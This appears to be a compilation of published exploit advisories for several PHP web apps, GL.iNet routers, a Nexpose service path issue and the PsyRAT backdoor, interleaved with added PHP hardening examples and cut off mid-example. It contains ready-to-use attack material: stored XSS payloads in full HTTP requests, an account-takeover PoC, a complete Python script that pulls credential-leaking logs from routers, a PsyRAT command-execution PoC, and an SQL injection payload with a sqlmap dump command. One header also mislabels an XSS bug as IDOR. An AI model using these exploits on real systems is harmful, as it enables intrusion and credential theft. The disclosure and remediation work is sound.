<pre><code>#Vulnerability Details:<br />#Application Name: Computer Laboratory Management System<br />#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br />#Vendor Homepage: https://www.sourcecodester.com/users/tips23<br />#BuG: Insecure Direct Object References (IDOR) and Account Takeover<br />#BuG_Author: SoSPiro<br />#CVE: CVE-2024-3140<br /><br /># Vulnerable code section:<br /><br />foreach($_POST as $k => $v){<br /> $v = $this->conn->real_escape_string($v);<br /> if(in_array($k, $main_field)){<br /> if(!empty($data)) $data .= ", ";<br /> $data .= " `{$k}` = '{$v}' ";<br /> }<br />}<br /><br />- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.<br /><br /># Vulnerability Description:<br /><br />- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. 
When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.<br /><br /><br /># Proof of Concept (PoC):<br /><br />- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing<br /><br /><br />- Request:<br /><br /><br />POST /php-lms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571<br />Content-Length: 946<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-lms/admin/?page=user<br />Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />X-PwnFox-Color: green<br /><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="id"<br /><br />8<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="firstname"<br /><br />staff2<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="middlename"<br /><br /><script>alert(1)</script><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="lastname"<br /><br />asd<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="username"<br /><br />staff<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: 
application/octet-stream<br /><br /><br />-----------------------------381104392340117332004262429571--<br /><br />- In this POST request, an attacker has included a script tag in the "middlename" field:<br /><br /><script>alert(1)</script><br /><br />- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.<br /><br /><br /><br /># Impact:<br /><br />- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.<br /><br /><br /><br /># Reproduce:<br /><br />https://github.com/Sospiro014/zday1/blob/main/xss_1.md<br />https://vuldb.com/?id.258915<br />https://www.cve.org/CVERecord?id=CVE-2024-3140<br /><br /><br /><br /></code></pre>
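The loop quoted above restricts column names through $main_field but still interpolates the escaped values into the SQL string and later renders them unencoded: real_escape_string() only protects the SQL text, so a stored script tag is still interpreted as HTML when the admin's user list is rendered. The following is an added example, not code from the project, showing the two fixes together: bound parameters on the way into the database and HTML encoding on the way out. It assumes a connected mysqli handle $conn, a table named users, and that $id has already been authorized for the current session (the function and constant names are the example's own).

```php
<?php
// Added example, not the project's code: a hardened replacement for the
// foreach($_POST ...) loop in Users::save()/registration(), plus the output-side fix.
// Assumptions: $conn is a connected mysqli handle, the table is `users`, and
// $id has already been authorized for the current session.

// Iterate an allowlist of columns rather than whatever keys arrive in $_POST.
const USER_FIELDS = ['firstname', 'middlename', 'lastname', 'username'];

function build_user_update(array $post): array {
    $set = [];
    $params = [];
    foreach (USER_FIELDS as $field) {          // allowlist drives the loop, not $_POST
        if (!array_key_exists($field, $post)) {
            continue;
        }
        $value = trim((string)$post[$field]);
        if ($value === '' || strlen($value) > 100) {
            throw new InvalidArgumentException("Invalid value for {$field}");
        }
        $set[] = "`{$field}` = ?";             // column name comes from the constant
        $params[] = $value;                    // value travels as a bound parameter
    }
    if ($set === []) {
        throw new InvalidArgumentException('No updatable fields supplied');
    }
    $sql = 'UPDATE `users` SET ' . implode(', ', $set) . ' WHERE `id` = ?';
    return [$sql, $params];
}

function save_user(mysqli $conn, int $id, array $post): bool {
    [$sql, $params] = build_user_update($post);
    $params[] = $id;
    $stmt = $conn->prepare($sql);
    // all text columns bound as strings, the trailing id as an integer
    $stmt->bind_param(str_repeat('s', count($params) - 1) . 'i', ...$params);
    return $stmt->execute();
}

// Output encoding is the fix for the XSS itself: every stored value is encoded
// at the point it is written into the admin's user list, whatever was validated on input.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_user_row(array $row): string {
    $cells = array_map('h', [$row['firstname'], $row['middlename'], $row['lastname'], $row['username']]);
    return '<tr><td>' . implode('</td><td>', $cells) . '</td></tr>';
}

// Constructed sample row using the middlename value from the PoC request above.
$row = [
    'firstname'  => 'staff2',
    'middlename' => '<script>alert(1)</script>',
    'lastname'   => 'asd',
    'username'   => 'staff',
];
echo render_user_row($row), PHP_EOL;
```

Running the script prints the row with the script tag turned into &lt;script&gt;...&lt;/script&gt;, which the browser displays as text instead of executing. The prepared statement is what removes the SQL-side risk of the original string building; the encoding function is what removes the stored XSS, and the two are independent layers.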
<pre><code>#Vulnerability Details:<br />#Application Name: Computer Laboratory Management System<br />#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br />#Vendor Homepage: https://www.sourcecodester.com/users/tips23<br />#BuG: Insecure Direct Object References (IDOR) and Account Takeover<br />#BuG_Author: SoSPiro<br />#CVE: CVE-2024-3139<br /><br /># Vulnerable code section:<br /><br />if(!empty($_FILES['img']['tmp_name'])){<br /> if(!is_dir(base_app."uploads/avatars"))<br /> mkdir(base_app."uploads/avatars");<br /> $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);<br /> $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path<br /> // Rest of the code<br />}<br /><br /><br /># Vulnerability Description:<br /><br />This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. 
This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.<br /><br /><br /><br /># Proof of Concept (PoC):<br /><br />- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing<br /><br /><br />- Request:<br /><br />POST /php-lms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024<br />Content-Length: 8393<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-lms/admin/?page=user<br />Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />X-PwnFox-Color: green<br /><br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="id"<br /><br />7<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="firstname"<br /><br />testtt<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="middlename"<br /><br />testMiddle <br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="lastname"<br /><br />te Last Name <br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="username"<br /><br />admin2<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="password"<br /><br />qwe123<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="img"; filename="hack.png"<br />Content-Type: 
image/png<br /><br />PNG<br />...<br /><br />- Response:<br /><br /><br />HTTP/1.1 200 OK<br />Date: Mon, 01 Apr 2024 10:19:19 GMT<br />Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev<br />X-Powered-By: PHP/8.2.0<br />X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br /><br /># Impact:<br /><br />This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.<br /><br /><br /><br /># Reproduce:<br /><br />https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md<br />https://vuldb.com/?id.258914<br />https://www.cve.org/CVERecord?id=CVE-2024-3139<br /><br /><br /><br /></code></pre>
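The root cause described above is that $id is taken from the request and used both to select the row to update and to name the avatar file, with no check that the caller may touch that record. Below is an added example, not the project's code, of the authorization step and the upload handling a save handler needs before it uses $id. The session keys login_id and login_type (1 = admin) and the function names are assumptions of the example; base_app is the project's own upload base constant.

```php
<?php
// Added example, not the project's code: object-level authorization for the $id
// used by Users::save() and by the avatar upload path.
// Assumptions: session keys 'login_id' and 'login_type' (1 = admin) are hypothetical
// names; base_app is the project's upload base constant.

function authorize_profile_edit(array $session, $requestedId): int {
    if (empty($session['login_id'])) {
        http_response_code(401);
        throw new RuntimeException('Not authenticated');
    }
    // The id must be a positive integer; "7abc", "../7" or "" are rejected here.
    $id = filter_var($requestedId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        throw new RuntimeException('Invalid id');
    }
    $isAdmin = isset($session['login_type']) && (int)$session['login_type'] === 1;
    // Object-level check: a non-admin may only edit its own record, so a staff
    // session can no longer submit id=7 and overwrite the administrator's row.
    if (!$isAdmin && (int)$session['login_id'] !== $id) {
        http_response_code(403);
        throw new RuntimeException('Not allowed to modify this account');
    }
    return $id;
}

function store_avatar(array $file, int $id, string $baseDir): ?string {
    if (empty($file['tmp_name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;                           // no file sent: nothing to do
    }
    // Trust the bytes, not the client-supplied filename or Content-Type header.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !in_array($info[2], [IMAGETYPE_PNG, IMAGETYPE_JPEG], true)) {
        throw new RuntimeException('Upload is not a PNG/JPEG image');
    }
    $dir = rtrim($baseDir, '/') . '/uploads/avatars';
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('Cannot create avatar directory');
    }
    // $id is a validated integer, so the resulting path cannot escape $dir.
    $dest = $dir . '/' . $id . '.png';
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Failed to store avatar');
    }
    return $dest;
}

// How the save handler would use it (constructed call, not the project's code):
session_start();
$id = authorize_profile_edit($_SESSION, $_POST['id'] ?? '');
$avatar = store_avatar($_FILES['img'] ?? [], $id, base_app);
```

With this in front of the update, the PoC request (a non-admin session posting id=7 with a new username and password) is refused with 403 before any row or file is written. A password change should additionally require the current password, which keeps a hijacked session from silently locking the real user out.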
<pre><code># Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 28-03-2024<br /># Exploit Author: Sandeep Vishwakarma<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html<br /># Version: v1.0<br /># Tested on: Windows 10<br /># Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameters in the profile component.<br /><br /># POC:<br />1. After login, go to http://127.0.0.1/E-Insurance/Script/admin/?page=profile<br />2. In the fname & lname parameters add the payload<br />"><script>alert("Hacked_by_Sandy")</script><br />3. Click on submit.<br /><br /># Reference:<br />https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md<br /><br /></code></pre>
<pre><code># Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download<br /># CVE: CVE-2024-27356<br /># Google Dork: intitle:"GL.iNet Admin Panel"<br /># Date: 2/26/2024<br /># Exploit Author: Bandar Alharbi (aggressor)<br /># Vendor Homepage: www.gl-inet.com<br /># Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin<br /># Tested Model: GL-X3000 Spitz AX<br /># Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md<br /><br />import sys<br />import requests<br />import json<br />requests.packages.urllib3.disable_warnings()<br />h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}<br /><br />def DoesTarExist():<br /> r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)<br /> if r.status_code == 200:<br /> f = open("logread.tar", "wb")<br /> f.write(r.content)<br /> f.close()<br /> print("[*] Full logs archive `logread.tar` has been downloaded!")<br /> print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")<br /> return True<br /> else:<br /> print("[*] The `logread.tar` archive does not exist however ... 
try again later!")<br /> return False<br /><br />def isVulnerable():<br /> r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)<br /> if r1.status_code == 500 and "nginx" in r1.text:<br /> r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)<br /> if "Admin-Token" in r2.text:<br /> j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}<br /> r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)<br /> ver = r3.json()['result']['firmware_version']<br /> model = r3.json()['result']['model']<br /> if ver.startswith(('4.')):<br /> print("[*] Firmware version (%s) is vulnerable!" %ver)<br /> print("[*] Device model is: %s" %model)<br /> return True<br /> print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")<br /> return False<br /><br />def isAlive():<br /> try:<br /> r = requests.get(url, verify=False, timeout=30, headers=h)<br /> if r.status_code != 200:<br /> print("[*] Make sure the target's web interface is accessible!")<br /> return False<br /> elif r.status_code == 200:<br /> print("[*] The target is reachable!")<br /> return True<br /> except Exception:<br /> print("[*] Error occurred when connecting to the target!")<br /> pass<br /> return False<br /><br />if __name__ == '__main__':<br /> if len(sys.argv) != 2:<br /> print("exploit.py url")<br /> sys.exit(0)<br /> url = sys.argv[1]<br /> url = url.lower()<br /> if not url.startswith(('http://', 'https://')):<br /> print("[*] Invalid url format! 
It should be http[s]://<domain or ip>")<br /> sys.exit(0)<br /> if url.endswith("/"):<br /> url = url.rstrip("/")<br /><br /> print("[*] GL.iNet Unauthenticated Full Logs Downloader")<br /><br /> try:<br /> if (isAlive() and isVulnerable()) == (True and True):<br /> DoesTarExist()<br /> except KeyboardInterrupt:<br /> print("[*] The exploit has been stopped by the user!")<br /> sys.exit(0)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path<br /># Date: 2024-04-2<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.rapid7.com/<br /># Software Link: https://www.rapid7.com/products/nexpose/<br /># Version: 6.6.240<br /># Tested: Windows 10 x64<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname<br /><br />DisplayName Name PathName StartMode StartName <br />Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem<br /><br /># Service info:<br /><br />C:\Users\saudh>sc qc nexposeconsole<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: nexposeconsole<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Nexpose Security Console<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)<br /># Date: 2023-11-14<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46020<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitization of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.<br /><br />Vulnerable File: updateprofile.php<br /><br />Parameters: rename, remail, rphone, rcity<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Intercept the POST request to updateprofile.php via Burp Suite<br />2. Inject the payload into the vulnerable parameters<br />3. Payload: "><svg/onload=alert(document.domain)><br />4. 
Example request for rname parameter:<br /><br />---<br /><br />POST /bloodbank/file/updateprofile.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 103<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/bloodbank/rprofile.php?id=1<br />Cookie: PHPSESSID=<some-cookie-value><br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update<br /><br />----<br /><br />5. Go to the profile page and trigger the XSS<br /><br />XSS Payload:<br /><br />"><svg/onload=alert(document.domain)><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.ju (PSYRAT)<br />Vulnerability: Authentication Bypass RCE<br />Family: PSYRAT<br />Type: PE32<br />MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3<br />Vuln ID: MVID-2024-0677<br />Disclosure: 04/01/2024<br /><br />Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and/or "Invalid command" error string, but the command executes regardless. A custom client is required, as it seems to dislike CRLF \r\n characters when using netcat or telnet.<br /><br />getdrives <br />C\ - Fixed Drive^D\ - CD-ROM^<br /><br />cpuinfo <br />Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URL<br /><br />exe_sho [Program_Name] starts a program <br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=55116<br /><br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((MALWARE_HOST, PORT))<br /><br />#send bad password<br />PAYLOAD="malvuln" <br />s.send(PAYLOAD.encode())<br /><br />#call commands<br />PAYLOAD="exe_sho calc" <br />s.send(PAYLOAD.encode())<br /><br />s.close()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24496<br /><br />### Broken Access Control:<br /><br />> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.<br /><br />### Affected Components:<br /><br />> home.php, add-tracker.php, delete-tracker.php, update-tracker.php<br /><br />### Description:<br /><br />> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.<br /><br />## Proof of Concept:<br /><br />### Unauthenticated Access to Home page<br /><br />> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. 
The application does not verify whether the user is authenticated or authorized to access this page.<br /><br />### Create Tracker as Unauthenticated User<br /><br />To create a tracker, use the following request:<br /><br />```<br />POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 108<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes<br />```<br /><br />### Update Tracker as Unauthenticated User<br /><br />To update a tracker, use the following request:<br /><br />```<br />POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 121<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br 
/>tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes<br />```<br /><br />### Delete Tracker as Unauthenticated User:<br /><br />To delete a tracker, use the following request:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />```<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.<br /><br /></code></pre>
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - SQL Injection<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24495<br /><br />### SQL Injection:<br /><br />> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.<br /><br />### Affected Components:<br /><br />> delete-tracker.php<br /><br />### Description:<br /><br />> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.<br /><br />## Proof of Concept:<br /><br />### Manual Exploitation<br /><br />The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br 
/>Sec-Fetch-User: ?1<br />```<br /><br />![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)<br /><br />### SQLMap<br /><br />Save the following request to `delete_tracker.txt`:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />```<br /><br />Use `sqlmap` with `-r` option to exploit the vulnerability:<br /><br />```<br />sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump<br />```<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.<br /><br /></code></pre>
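The two Daily Habit Tracker advisories above share one endpoint, delete-tracker.php, which accepts the tracker id from an unauthenticated request and places it straight into the query (which is why the SLEEP(5) payload works). The following is an added example, not the project's code, of how that endpoint looks with a login gate, integer validation of the parameter, and a prepared statement whose WHERE clause is also scoped to the caller's own rows. The table name tbl_tracker and its user_id column, the session key user_id, and the include path are assumptions of the example; tbl_tracker_id and the tracker parameter are the names the advisories use.

```php
<?php
// Added example, not the project's code: a hardened delete-tracker.php for the
// Daily Habit Tracker, covering the broken access control and the SQL injection
// in the `tracker` parameter.
// Assumptions: $conn is a mysqli handle provided by the project's database include
// (hypothetical path below); the table is `tbl_tracker` with an integer primary key
// `tbl_tracker_id` and an owner column `user_id`; session key 'user_id' is hypothetical.
require_once __DIR__ . '/../connection.php';   // hypothetical include that defines $conn

// Authentication gate: every endpoint (home, add, update, delete) starts with this,
// so an unauthenticated request never reaches the query.
function require_login(array $session): int {
    if (empty($session['user_id'])) {
        http_response_code(401);
        exit('Login required');
    }
    return (int)$session['user_id'];
}

// Input validation: the advisory's payload 5'"";SELECT SLEEP(5)# is rejected here
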